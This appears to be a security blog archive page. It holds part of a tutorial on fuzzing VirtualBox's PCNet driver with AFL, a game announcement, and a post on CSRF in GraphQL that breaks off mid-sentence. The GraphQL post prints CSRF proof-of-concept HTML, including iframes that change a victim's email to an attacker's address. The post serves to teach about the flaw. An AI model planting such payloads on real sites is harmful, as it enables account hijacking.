$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/Config.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/undefined_xfree86.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/DevVGA-SVGA3d-glLdr.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/VBoxDTraceLibCWrappers.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/os_Linux_x86_64.patch

Running kmk without KBUILD_TYPE yields instrumented binaries, where the device drivers are bundled inside the VBoxDD.so shared object. The output from nm confirms the presence of the instrumentation symbols:

$ nm out/linux.amd64/release/bin/VBoxDD.so | egrep "afl|sancov"
                 U __afl_area_ptr
                 U __afl_coverage_discard
                 U __afl_coverage_off
                 U __afl_coverage_on
                 U __afl_coverage_skip
000000000033e124 d __afl_selective_coverage
0000000000028030 t sancov.module_ctor_trace_pc_guard
000000000033f5a0 d __start___sancov_guards
000000000036f158 d __stop___sancov_guards
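The same check can be scripted, which helps when several shared objects need verifying after each rebuild. The Python sketch below filters nm output for the afl and sancov markers. The sample text is a shortened copy of the output above plus one made-up uninstrumented symbol line for contrast, and the function name is hypothetical.

```python
import re

MARKER_RE = re.compile(r"afl|sancov")


def instrumentation_symbols(nm_output):
    """Return symbol names from nm output that mention afl or sancov."""
    symbols = []
    for line in nm_output.splitlines():
        fields = line.split()
        # The symbol name is the last whitespace-separated field on each line
        if fields and MARKER_RE.search(fields[-1]):
            symbols.append(fields[-1])
    return symbols


SAMPLE = """\
                 U __afl_area_ptr
000000000033e124 d __afl_selective_coverage
0000000000028030 t sancov.module_ctor_trace_pc_guard
0000000000001234 T some_other_symbol
"""
print(instrumentation_symbols(SAMPLE))
# Real input could come from:
# subprocess.run(["nm", path], capture_output=True, text=True, check=True).stdout
```

An empty list for a library that should have been instrumented is a sign that the AFL template was not picked up for that component.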

Creating Coverage Reports

First, we have to apply the patches for AFL, described in the previous section. After that, we copy the instrumented version and remove the earlier compiled binaries if they are present:

$ VERSION=6.1.30
$ cp -r ~/VirtualBox-$VERSION-release-afl ~/VirtualBox-$VERSION-release-afl-gcov
$ cd ~/VirtualBox-$VERSION-release-afl-gcov
$ rm -rf out

Now we have to edit the kBuild/tools/AFL.kmk template to append -fprofile-instr-generate -fcoverage-mapping switches as follows:

TOOL_AFL_CC  ?= afl-clang-fast$(HOSTSUFF_EXE)   -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_CXX ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_AS  ?= afl-clang-fast$(HOSTSUFF_EXE)   -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_LD  ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping

To avoid duplication, we share the src and include folders with the fuzzing build:

$ rm -rf ./src
$ rm -rf ./include

$ ln -s ../VirtualBox-$VERSION-release-afl/src $PWD/src
$ ln -s ../VirtualBox-$VERSION-release-afl/include $PWD/include

Lastly, we expand the list of undefined symbols inside src/VBox/Additions/x11/undefined_xfree86 by adding:

ftell
uname
strerror
mkdir
__cxa_atexit
fclose
fileno
fdopen
strrchr
fseek
fopen
ftello
prctl
strtol
getpid
mmap
getpagesize
strdup

Furthermore, because this build is intended for reporting only, we disable all unnecessary features:

$ ./configure --disable-hardening --disable-docs --disable-java --disable-qt
$ source ./env.sh && kmk

The raw profile is generated by setting LLVM_PROFILE_FILE. For more information, the Clang documentation provides the necessary details.

Writing a harness

Getting pVM

At this point, the VirtualBox drivers are fully instrumented, and the only remaining thing left before we start fuzzing is a harness. The PCNet device driver is defined in src/VBox/Devices/Network/DevPCNet.cpp, and it exports several functions. Our output is truncated to include only R3 components, as these are the ones we are targeting:

/**
 * The device registration structure.
 */
const PDMDEVREG g_DevicePCNet =
{
    /* .u32Version = */             PDM_DEVREG_VERSION,
    /* .uReserved0 = */             0,
    /* .szName = */                 "pcnet",
#ifdef PCNET_GC_ENABLED
    /* .fFlags = */                 PDM_DEVREG_FLAGS_DEFAULT_BITS | PDM_DEVREG_FLAGS_RZ | PDM_DEVREG_FLAGS_NEW_STYLE,
#else
    /* .fFlags = */                 PDM_DEVREG_FLAGS_DEFAULT_BITS,
#endif
    /* .fClass = */                 PDM_DEVREG_CLASS_NETWORK,
    /* .cMaxInstances = */          ~0U,
    /* .uSharedVersion = */         42,
    /* .cbInstanceShared = */       sizeof(PCNETSTATE),
    /* .cbInstanceCC = */           sizeof(PCNETSTATECC),
    /* .cbInstanceRC = */           sizeof(PCNETSTATERC),
    /* .cMaxPciDevices = */         1,
    /* .cMaxMsixVectors = */        0,
    /* .pszDescription = */         "AMD PCnet Ethernet controller.\n",
#if defined(IN_RING3)
    /* .pszRCMod = */               "VBoxDDRC.rc",
    /* .pszR0Mod = */               "VBoxDDR0.r0",
    /* .pfnConstruct = */           pcnetR3Construct,
    /* .pfnDestruct = */            pcnetR3Destruct,
    /* .pfnRelocate = */            pcnetR3Relocate,
    /* .pfnMemSetup = */            NULL,
    /* .pfnPowerOn = */             NULL,
    /* .pfnReset = */               pcnetR3Reset,
    /* .pfnSuspend = */             pcnetR3Suspend,
    /* .pfnResume = */              NULL,
    /* .pfnAttach = */              pcnetR3Attach,
    /* .pfnDetach = */              pcnetR3Detach,
    /* .pfnQueryInterface = */      NULL,
    /* .pfnInitComplete = */        NULL,
    /* .pfnPowerOff = */            pcnetR3PowerOff,
    /* .pfnSoftReset = */           NULL,
    /* .pfnReserved0 = */           NULL,
    /* .pfnReserved1 = */           NULL,
    /* .pfnReserved2 = */           NULL,
    /* .pfnReserved3 = */           NULL,
    /* .pfnReserved4 = */           NULL,
    /* .pfnReserved5 = */           NULL,
    /* .pfnReserved6 = */           NULL,
    /* .pfnReserved7 = */           NULL,
#elif defined(IN_RING0)
// [ SNIP ]

The most interesting fields are .pfnReset, which resets the driver’s state, and the .pfnReserved functions. The latter are currently unused, but by modifying the PDM (Pluggable Device Manager) header files we can replace them with our own functions and call those. PDM is an abstract interface that makes it relatively easy to add new virtual devices.

But first, if we want to use the modified VBoxHeadless, which provides a high-level interface (the VirtualBox Main API) to the VirtualBox functionality, we need to find a way to access the pdm structure.

By reading the source code, we can see multiple patterns where pVM (pointer to a VM handle) is dereferenced to traverse a linked list with all device instances:

// src/VBox/VMM/VMMR3/PDMDevice.cpp

for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3)
{
    // [ SNIP ]
}

The VirtualBox Main API on non-Windows platforms uses Mozilla XPCOM, so we wanted to find out whether we could leverage it to access the low-level structures. After some digging, we found that it is indeed possible to retrieve the VM handle via the IMachineDebugger class.

With that, the following snippet of code demonstrates how to access pVM:

LONG64 llVM;
HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);
PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
PVM pVM = pUVM->pVM;

After obtaining the pointer to the VM, we have to change the build scripts again, allowing VBoxHeadless to access internal PDM definitions from VBoxHeadless.cpp.

We tried to minimize the number of changes and, after some experimentation, came up with the following steps:

1) Create a new file called src/VBox/Frontends/Common/harness.h with this content:

/* without this, include/VBox/vmm/pdmtask.h does not import PDMTASKTYPE enum */
#define VBOX_IN_VMM 1

#include "PDMInternal.h"

/* needed by machineDebugger COM VM getter */
#include <VBox/vmm/vm.h>
#include <VBox/vmm/uvm.h>

/* needed by AFL */
#include <unistd.h>

2) Modify the src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp file by adding the following code just before the event loop starts, near the end of the file:

            LogRel(("VBoxHeadless: failed to start windows message monitor: %Rrc\n", irc));
#endif /* RT_OS_WINDOWS */

        /* --------------- BEGIN --------------- */
        LONG64 llVM;
        HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);

        /* Dereference the handle only if the getter succeeded */
        if (SUCCEEDED(hrc)) {

            PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
            PVM pVM = pUVM->pVM;

            for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3) {
                if (!strcmp(pDevIns->pReg->szName, "pcnet")) {

                    unsigned char *buf = __AFL_FUZZ_TESTCASE_BUF;
                    while (__AFL_LOOP(10000))
                    {
                        int len = __AFL_FUZZ_TESTCASE_LEN;
                        pDevIns->pReg->pfnAFL(pDevIns, buf, len);
                    }
                }
            }

        }
        exit(0);
        /* ---------------  END  --------------- */

        /*
         * Pump vbox events forever
         */
        LogRel(("VBoxHeadless: starting event loop\n"));
        for (;;)

3) In the same file, after the #include "PasswordInput.h" directive, add:

#include "harness.h"

Finally, add __AFL_FUZZ_INIT(); just before the definition of the TrustedMain function:

__AFL_FUZZ_INIT();

/**
 *  Entry point.
 */
extern "C" DECLEXPORT(int) TrustedMain(int argc, char **argv, char **envp)

4) Edit src/VBox/Frontends/VBoxHeadless/Makefile.kmk and change the VBoxHeadless_DEFS and VBoxHeadless_INCS from

VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS     += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,)
VBoxHeadless_INCS      = \
  $(VBOX_GRAPHICS_INCS) \
  ../Common

to

VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS     += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,) $(VMM_COMMON_DEFS)
VBoxHeadless_INCS      = \
        $(VBOX_GRAPHICS_INCS) \
        ../Common \
        ../../VMM/include

Fuzzing With Multiple Inputs

For the network drivers, there are various ways of supplying user-controlled data: by using I/O port access instructions, or by reading the data from the emulated device via MMIO (PDMDevHlpPhysRead). If this part is unclear, please refer back to [1] in the references, which is probably the best available resource explaining the attack surface. Moreover, many ports and values are restricted to a specific set, and to save some time we want to use only those values. Therefore, while considering how to implement our fuzzing framework, we discovered Fuzzed Data Provider (FDP from here on).

FDP is part of LLVM. Once we pass it a buffer generated by AFL, it can use that buffer to generate a restricted set of numbers, bytes, or enums. We can store a pointer to the FDP inside the device driver instance and retrieve it any time we need to feed data to the driver.
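
To make the idea concrete, here is a minimal Python sketch of the same concept. It is not LLVM's FuzzedDataProvider (which is a C++ header and consumes bytes in a different order); MiniFDP, decode_ops and the operation names are hypothetical and only illustrate how a raw fuzzer buffer can be turned into a stream of constrained values.

```python
# Simplified, hypothetical analogue of a fuzzed data provider.
# It always consumes from the front of the buffer and yields zeros
# once the buffer is exhausted; the real LLVM class behaves differently.

OPS = ("io_port_write", "aprom_write", "mmio_write", "noop")
WIDTHS = (1, 2, 4)  # access sizes in bytes, mirroring the {1, 2, 4} set


class MiniFDP:
    def __init__(self, data: bytes) -> None:
        self._data = data
        self._pos = 0

    def remaining_bytes(self) -> int:
        return len(self._data) - self._pos

    def consume_uint(self, nbytes: int) -> int:
        """Consume up to nbytes and interpret them as a little-endian integer."""
        chunk = self._data[self._pos:self._pos + nbytes]
        self._pos += len(chunk)
        return int.from_bytes(chunk, "little")

    def consume_int_in_range(self, lo: int, hi: int) -> int:
        """Return a value in [lo, hi], derived from the next input bytes."""
        span = hi - lo + 1
        nbytes = max(1, ((span - 1).bit_length() + 7) // 8)
        return lo + self.consume_uint(nbytes) % span

    def pick_value(self, options):
        return options[self.consume_int_in_range(0, len(options) - 1)]


def decode_ops(data: bytes):
    """Turn a raw fuzzer buffer into a list of (operation, port, value, width)."""
    fdp = MiniFDP(data)
    ops = []
    while fdp.remaining_bytes() > 0:
        choice = fdp.consume_int_in_range(0, 3)
        port = fdp.consume_uint(2)
        value = fdp.consume_uint(4)
        width = fdp.pick_value(WIDTHS)
        ops.append((OPS[choice], port, value, width))
    return ops


sample = bytes([0x02, 0x10, 0x00, 0x78, 0x56, 0x34, 0x12, 0x01])
print(decode_ops(sample))
```

Every byte string decodes to a well-formed sequence of operations, so the fuzzer spends its time exercising driver logic rather than producing inputs that are rejected up front.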

Recall that we can use the pfnReserved fields to implement our fuzzing helper functions. For this, it’s enough to edit include/VBox/vmm/pdmdev.h and change the PDMDEVREGR3 structure to conform to our prototype:

DECLR3CALLBACKMEMBER(int, pfnAFL, (PPDMDEVINS pDevIns, unsigned char *buf, int len));
DECLR3CALLBACKMEMBER(void *, pfnGetFDP, (PPDMDEVINS pDevIns));
DECLR3CALLBACKMEMBER(int, pfnReserved2, (PPDMDEVINS pDevIns));

All device drivers have a state, which we can access using the convenient PDMDEVINS_2_DATA macro. Likewise, we can include the FDP header file and extend the state structure (in our case PCNETSTATE) with a pointer to the FDP:

// src/VBox/Devices/Network/DevPCNet.cpp

#ifdef IN_RING3
# include <iprt/mem.h>
# include <iprt/semaphore.h>
# include <iprt/uuid.h>
# include <fuzzer/FuzzedDataProvider.h> /* Add this */
#endif

// [ SNIP ]

typedef struct PCNETSTATE
{
  // [ SNIP ]
#endif /* VBOX_WITH_STATISTICS */
    void * fdp; /* Add this */
} PCNETSTATE;
/** Pointer to a shared PCnet state structure. */
typedef PCNETSTATE *PPCNETSTATE;

To reflect these changes, the g_DevicePCNet structure has to be updated too:

/**
 * The device registration structure.
 */
const PDMDEVREG g_DevicePCNet =
{
  // [[ SNIP ]]
  /* .pfnConstruct = */           pcnetR3Construct,
  // [[ SNIP ]]
  /* .pfnReserved0 = */           pcnetR3_AFL,
  /* .pfnReserved1 = */           pcnetR3_GetFDP,

When adding new functions, we must be careful to place them inside the R3-only parts. The easiest way is to find the R3 constructor and add the new code just after it, as that region is already guarded by the IN_RING3 macro for conditional compilation.

An example of the PCNet harness:

static DECLCALLBACK(void *) pcnetR3_GetFDP(PPDMDEVINS pDevIns) {
    PPCNETSTATE     pThis   = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);
    return pThis->fdp;
}

__AFL_COVERAGE();
static DECLCALLBACK(int) pcnetR3_AFL(PPDMDEVINS pDevIns, unsigned char *buf, int len)
{
    if (len > 0x2000) {
        __AFL_COVERAGE_SKIP();
        return VINF_SUCCESS;
    }

    static unsigned char buf2[0x2000];
    memcpy(buf2, buf, len);
    FuzzedDataProvider provider(buf2, len);

    PPCNETSTATE     pThis   = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);

    pThis->fdp = &provider; // Make it accessible for the other modules
    FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);

    void *pvUser = NULL;
    uint32_t u32;
    const std::array<int, 3> Array = {1, 2, 4};
    uint16_t offPort;
    uint16_t cb;

    pcnetR3Reset(pDevIns);

    __AFL_COVERAGE_DISCARD();
    __AFL_COVERAGE_ON();

    while (pfdp->remaining_bytes() > 0) {
        auto choice = pfdp->ConsumeIntegralInRange(0, 3);
        offPort = pfdp->ConsumeIntegral<uint16_t>();

        u32 = pfdp->ConsumeIntegral<uint32_t>();
        cb = pfdp->PickValueInArray(Array);

        switch (choice) {
            case 0:
                // pcnetIoPortWrite(PPDMDEVINS pDevIns, void *pvUser, 
                //   RTIOPORT offPort, uint32_t u32, unsigned cb)
                pcnetIoPortWrite(pDevIns, pvUser, offPort, u32, cb);
                break;
            case 1:
                // pcnetIoPortAPromWrite(PPDMDEVINS pDevIns, void *pvUser, 
                //   RTIOPORT offPort, uint32_t u32, unsigned cb)
                pcnetIoPortAPromWrite(pDevIns, pvUser, offPort, u32, cb);
                break;
            case 2:
                // pcnetR3MmioWrite(PPDMDEVINS pDevIns, void *pvUser,
                //   RTGCPHYS off, void const *pv, unsigned cb)
                pcnetR3MmioWrite(pDevIns, pvUser, offPort, &u32, cb);
                break;
            default:
                break;
        }

    }
    __AFL_COVERAGE_OFF();

    pThis->fdp = NULL;
    return VINF_SUCCESS;
}

Fuzzing PDMDevHlpPhysRead

As the device driver calls this function multiple times, we decided to patch the wrapper instead of modifying every instance. We can do so by editing src/VBox/VMM/VMMR3/PDMDevHlp.cpp, adding the relevant FDP header, and changing the pdmR3DevHlp_PhysRead method to fuzz only the specific driver.

#include "dtrace/VBoxVMM.h"
#include "PDMInline.h"

#include <fuzzer/FuzzedDataProvider.h> /* Add this */

// [ SNIP ]

/** @interface_method_impl{PDMDEVHLPR3,pfnPhysRead} */
static DECLCALLBACK(int) pdmR3DevHlp_PhysRead(PPDMDEVINS pDevIns, RTGCPHYS GCPhys, void *pvBuf, size_t cbRead)
{
    PDMDEV_ASSERT_DEVINS(pDevIns);
    PVM pVM = pDevIns->Internal.s.pVMR3;
    LogFlow(("pdmR3DevHlp_PhysRead: caller='%s'/%d: GCPhys=%RGp pvBuf=%p cbRead=%#x\n",
             pDevIns->pReg->szName, pDevIns->iInstance, GCPhys, pvBuf, cbRead));

    /* Change this for the fuzzed driver */
    if (!strcmp(pDevIns->pReg->szName, "pcnet")) {
        FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);
        if (pfdp && pfdp->remaining_bytes() >= cbRead) {
            pfdp->ConsumeData(pvBuf, cbRead);
            return VINF_SUCCESS;
        }
    }

Using out/linux.amd64/release/bin/VBoxNetAdpCtl, we can add our network adapter and start fuzzing in persistent mode. However, even though we can reach more than 10k executions per second, we still have some work to do on stability.

Improving Stability

Unfortunately, none of the methods described here worked, as we were not able to use LTO instrumentation. We guess that’s because the device drivers module is dynamically loaded; as a result, it was possible neither to partially disable instrumentation nor to identify unstable edges. The instability is caused by the driver’s state not being reset properly and, because we are running the whole VM, by the many things under the hood that are not easy to influence, such as internal locks or the VMM.

One of the improvements is already contained in the harness, as we can discard the coverage before we start fuzzing and enable it only for a short fuzzing block.

Additionally, we can disable the instantiation of all devices which we are not currently fuzzing. The relevant code is inside src/VBox/VMM/VMMR3/PDMDevice.cpp, implementing the init completion routine through pdmR3DevInit. For the PCNet driver, at least the pci, VMMDev, and pcnet modules must be enabled. Therefore, we can skip the initialization for the rest.

    /*
     *
     * Instantiate the devices.
     *
     */
    for (i = 0; i < cDevs; i++)
    {
        PDMDEVREGR3 const * const pReg = paDevs[i].pDev->pReg;

        // if (!strcmp(pReg->szName, "pci")) {continue;}
        if (!strcmp(pReg->szName, "ich9pci")) {continue;}
        if (!strcmp(pReg->szName, "pcarch")) {continue;}
        if (!strcmp(pReg->szName, "pcbios")) {continue;}
        if (!strcmp(pReg->szName, "ioapic")) {continue;}
        if (!strcmp(pReg->szName, "pckbd")) {continue;}
        if (!strcmp(pReg->szName, "piix3ide")) {continue;}
        if (!strcmp(pReg->szName, "i8254")) {continue;}
        if (!strcmp(pReg->szName, "i8259")) {continue;}
        if (!strcmp(pReg->szName, "hpet")) {continue;}
        if (!strcmp(pReg->szName, "smc")) {continue;}
        if (!strcmp(pReg->szName, "flash")) {continue;}
        if (!strcmp(pReg->szName, "efi")) {continue;}
        if (!strcmp(pReg->szName, "mc146818")) {continue;}
        if (!strcmp(pReg->szName, "vga")) {continue;}
        // if (!strcmp(pReg->szName, "VMMDev")) {continue;}
        // if (!strcmp(pReg->szName, "pcnet")) {continue;}
        if (!strcmp(pReg->szName, "e1000")) {continue;}
        if (!strcmp(pReg->szName, "virtio-net")) {continue;}
        // if (!strcmp(pReg->szName, "IntNetIP")) {continue;}
        if (!strcmp(pReg->szName, "ichac97")) {continue;}
        if (!strcmp(pReg->szName, "sb16")) {continue;}
        if (!strcmp(pReg->szName, "hda")) {continue;}
        if (!strcmp(pReg->szName, "usb-ohci")) {continue;}
        if (!strcmp(pReg->szName, "acpi")) {continue;}
        if (!strcmp(pReg->szName, "8237A")) {continue;}
        if (!strcmp(pReg->szName, "i82078")) {continue;}
        if (!strcmp(pReg->szName, "serial")) {continue;}
        if (!strcmp(pReg->szName, "oxpcie958uart")) {continue;}
        if (!strcmp(pReg->szName, "parallel")) {continue;}
        if (!strcmp(pReg->szName, "ahci")) {continue;}
        if (!strcmp(pReg->szName, "buslogic")) {continue;}
        if (!strcmp(pReg->szName, "pcibridge")) {continue;}
        if (!strcmp(pReg->szName, "ich9pcibridge")) {continue;}
        if (!strcmp(pReg->szName, "lsilogicscsi")) {continue;}
        if (!strcmp(pReg->szName, "lsilogicsas")) {continue;}
        if (!strcmp(pReg->szName, "virtio-scsi")) {continue;}
        if (!strcmp(pReg->szName, "GIMDev")) {continue;}
        if (!strcmp(pReg->szName, "lpc")) {continue;}

       /*
         * Gather a bit of config.
         */
        /* trusted */

The most significant issue is that minimizing our test cases is not an option when the stability is low (the percentage depends on the drivers we fuzz). If we cannot reproduce the crash, we can at least intercept it and analyze it afterward in gdb.

We ran AFL in debug mode as a workaround, which yields a core file after every crash. Before running the fuzzer, this behavior can be enabled by:

$ export AFL_DEBUG=1
$ ulimit -c unlimited

Conclusion

We presented one of the possible approaches to fuzzing VirtualBox device drivers. We hope it contributes to a better understanding of VirtualBox internals. For inspiration, I’ll leave you with the quote from doc/VBox-CodingGuidelines.cpp:

 * (2)  "A really advanced hacker comes to understand the true inner workings of
 *      the machine - he sees through the language he's working in and glimpses
 *      the secret functioning of the binary code - becomes a Ba'al Shem of
 *      sorts."   (Neal Stephenson "Snow Crash")

References

H1.Jack, The Game

2022-02-16T00:00:00+01:00

As crazy as it sounds, we’re releasing a casual free-to-play mobile auto-battler for Android and iOS. We’re not changing line of business - just having fun with computers!

We believe that the greatest learning lessons come from outside your comfort zone, so whether it is a security audit or a new side hustle, we’re always challenging ourselves to improve the craft.

During the fall of 2019, we embarked on a pretty ambitious goal despite having virtually zero experience in game design. We partnered with a small game studio that was just getting started and decided to combine forces to design and develop a casual mobile game set in the *cyber* space. After many prototypes and changes of direction, we spent a good portion of our spare time in 2020 working on the core mechanics and graphics. Unfortunately, the limited time and budget further delayed beta testing and the final release. Making a game is no joke, especially when it is a combined side project for two thriving businesses.

Despite it all, we’re happy to announce the release of H1.Jack for Android and iOS as a free-to-play game with no advertisements. We hope you’ll enjoy the game in between your commutes and lunch breaks!

Android: https://play.google.com/store/apps/details?id=com.CobbleGames.Hijack
iOS (iPhone and iPad): https://apps.apple.com/app/hijack-game/id1517609205

No malware included.

H1.Jack is a casual mobile auto-battler inspired by cyber security events. Start from the very bottom and spend your money and fame on gaining new techniques and exploits. Heartbleed or Shellshock won’t be enough!

While playing, you might end up talking to John or Luca.

Our monsters are procedurally generated, meaning there will be tons of unique systems, apps, malware and bots to hack. Battle levels are also dynamically generated. If you want a sneak peek, check out the trailer:

That single GraphQL issue that you keep missing

2021-05-20T00:00:00+02:00

With the increasing popularity of GraphQL on the web, we would like to discuss a particular class of vulnerabilities that is often hidden in GraphQL implementations.

GraphQL what?

GraphQL is an open source query language, loved by many, that can help you in building meaningful APIs. Its major features are:

Aggregating data from multiple sources
Decoupling the data from the database underneath, through a graph form
Ensuring input type correctness with minimal effort from the developers

CSRF eh?

Cross Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web application causes a web browser to perform an unwanted action on behalf of an authenticated user. Such an attack works because browser requests automatically include all cookies, including session cookies.

GraphQL CSRF: more buzzword combos please!

POST-based CSRF

POST requests are natural CSRF targets, since they usually change the application state. GraphQL endpoints typically accept only requests whose Content-Type header is set to application/json, a setup that is widely believed to be invulnerable to CSRF. However, multiple layers of middleware may translate incoming requests from other formats (e.g. query parameters, application/x-www-form-urlencoded, multipart/form-data), so GraphQL implementations are often affected by CSRF anyway. Another incorrect assumption is that JSON cannot be created from urlencoded requests. When both of these assumptions are made, many developers may incorrectly forgo implementing proper CSRF protections.

The false sense of security works in the attacker’s favor, since it creates an attack surface which is easier to exploit. For example, a valid GraphQL query can be issued with a simple application/json POST request:

POST /graphql HTTP/1.1
Host: redacted
Connection: close
Content-Length: 100
accept: */*
User-Agent: ...
content-type: application/json
Referer: https://redacted/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ...

{"operationName":null,"variables":{},"query":"{\n  user {\n    firstName\n    __typename\n  }\n}\n"}

It is common, due to middleware magic, to have a server accept the same request as a form-urlencoded POST request:

POST /graphql HTTP/1.1
Host: redacted
Connection: close
Content-Length: 72
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://redacted
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ...

query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A

A seasoned Burp user can quickly convert this request to a CSRF PoC through Engagement Tools > Generate CSRF PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://redacted/graphql" method="POST">
      <input type="hidden" name="query" value="&#123;&#10;&#32;&#32;user&#32;&#123;&#10;&#32;&#32;&#32;&#32;firstName&#10;&#32;&#32;&#32;&#32;&#95;&#95;typename&#10;&#32;&#32;&#125;&#10;&#125;&#10;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

While the example above only presents a harmless query, that’s not always the case. Since GraphQL resolvers are usually decoupled from the underlying application layer, any other query can be issued in the same way, including mutations.
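
To see how little work the translation between the two request formats takes, the following Python sketch rebuilds the form-urlencoded body from the JSON body shown earlier. The helper name json_to_form_body is hypothetical, and whether a given server also accepts variables or operationName as form fields is an assumption that depends on the middleware in use.

```python
import json
from urllib.parse import urlencode

# JSON body taken from the application/json request shown earlier.
JSON_BODY = r'{"operationName":null,"variables":{},"query":"{\n  user {\n    firstName\n    __typename\n  }\n}\n"}'


def json_to_form_body(raw_json: str) -> str:
    """Re-encode a GraphQL JSON request body as application/x-www-form-urlencoded."""
    payload = json.loads(raw_json)
    fields = {"query": payload["query"]}
    # Assumption: optional fields are passed as extra form fields when present.
    if payload.get("variables"):
        fields["variables"] = json.dumps(payload["variables"])
    if payload.get("operationName"):
        fields["operationName"] = payload["operationName"]
    return urlencode(fields)


form_body = json_to_form_body(JSON_BODY)
print(form_body)
print("Content-Length:", len(form_body))
```

The result is a body that an HTML form can submit cross-origin without triggering a CORS preflight, which is exactly what makes the fallback parser dangerous.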

GET-based CSRF

There are two common issues that we have spotted during our past engagements.

The first one is using GET requests for both queries and mutations.

For example, in one of our recent engagements, the application was exposing a GraphiQL console. GraphiQL is only intended for use in development environments. When misconfigured, it can be abused to perform CSRF attacks on victims, causing their browsers to issue arbitrary query or mutation requests. In fact, GraphiQL does allow mutations via GET requests.

While CSRF in standard web applications usually affects only a handful of endpoints, the same issue in GraphQL is generally system-wide.

For the sake of an example, we include the Proof-of-Concept for a mutation that handles a file upload functionality:

<!DOCTYPE html>
<html>
<head>
    <title>GraphQL CSRF file upload</title>
</head>
	<body>
		<iframe src="https://graphql.victimhost.com/?query=mutation%20AddFile(%24name%3A%20String!%2C%20%24data%3A%20String!%2C%20%24contentType%3A%20String!) %20%7B%0A%20%20AddFile(file_name%3A%20%24name%2C%20data%3A%20%24data%2C%20content_type%3A%20%24contentType) %20%7B%0A%20%20%20%20id%0A%20%20%20%20__typename%0A%20%20%7D%0A%7D%0A&variables=%7B%0A %20%20%22data%22%3A%20%22%22%2C%0A%20%20%22name%22%3A%20%22dummy.pdf%22%2C%0A%20%20%22contentType%22%3A%20%22application%2Fpdf%22%0A%7D"></iframe>
	</body>
</html>

The second issue arises when a state-changing GraphQL operation is misplaced among the queries, which are normally non-state-changing. In fact, most GraphQL server implementations respect this paradigm, and they even block any kind of mutation through the GET HTTP method. Discovering this type of issue is trivial, and can be done by enumerating query names and trying to understand what they do. For this reason, we developed a tool for query/mutation enumeration.

During an engagement, we discovered the following query that was issuing a state-changing operation:

req := graphql.NewRequest(`
	query SetUserEmail($email: String!) {
		SetUserEmail(user_email: $email) {
			id
			email
		}
	}
`)

Given that the id value was easily guessable, we were able to prepare a CSRF PoC:

<!DOCTYPE html>
<html>
	<head>
		<title>GraphQL CSRF - State Changing Query</title> 
	</head>
	<body>
		<iframe width="1000" height="1000" src="https://victimhost.com/?query=query%20SetUserEmail%28%24email%3A%20String%21%29%20%7B%0A%20%20SetUserEmail%28user_email%3A%20%24email%29%20%7B%0A%20%20%20%20id%0A%20%20%20%20email%0A%20%20%7D%0A%7D%0A&variables=%7B%0A%20%20%22id%22%3A%20%22441%22%2C%0A%20%20%22email%22%3A%20%22attacker%40email.xyz%22%0A%7D"></iframe>
	</body>
</html>
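
A GET-based PoC URL of this shape can also be assembled programmatically, which avoids hand-encoding mistakes such as accidentally escaping the & that separates the query and variables parameters. The sketch below is only an illustration: build_graphql_get_url is a hypothetical helper, and it assumes the target reads the operation from a query parameter and its inputs from a JSON-encoded variables parameter.

```python
import json
from urllib.parse import parse_qs, quote, urlencode, urlsplit

QUERY = """query SetUserEmail($email: String!) {
  SetUserEmail(user_email: $email) {
    id
    email
  }
}
"""


def build_graphql_get_url(endpoint: str, query: str, variables: dict) -> str:
    """Encode a GraphQL operation and its variables as two separate GET parameters."""
    params = {"query": query, "variables": json.dumps(variables)}
    # quote_via=quote encodes spaces as %20 rather than +.
    return endpoint + "?" + urlencode(params, quote_via=quote)


url = build_graphql_get_url(
    "https://victimhost.com/", QUERY, {"email": "attacker@email.xyz"}
)
print(url)

# Round trip: the server side should see two distinct parameters.
decoded = parse_qs(urlsplit(url).query)
print(sorted(decoded))
```

Parsing the generated URL back, as done at the end, is a cheap way to confirm that the PoC carries the operation and its variables as the server expects them.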

Despite the most frequently used GraphQL servers/libraries having some sort of protection against CSRF, we have found that in some cases developers bypass the CSRF protection mechanisms. For example, if graphene-django is in use, there is an easy way to deactivate the CSRF protection on a particular GraphQL endpoint:

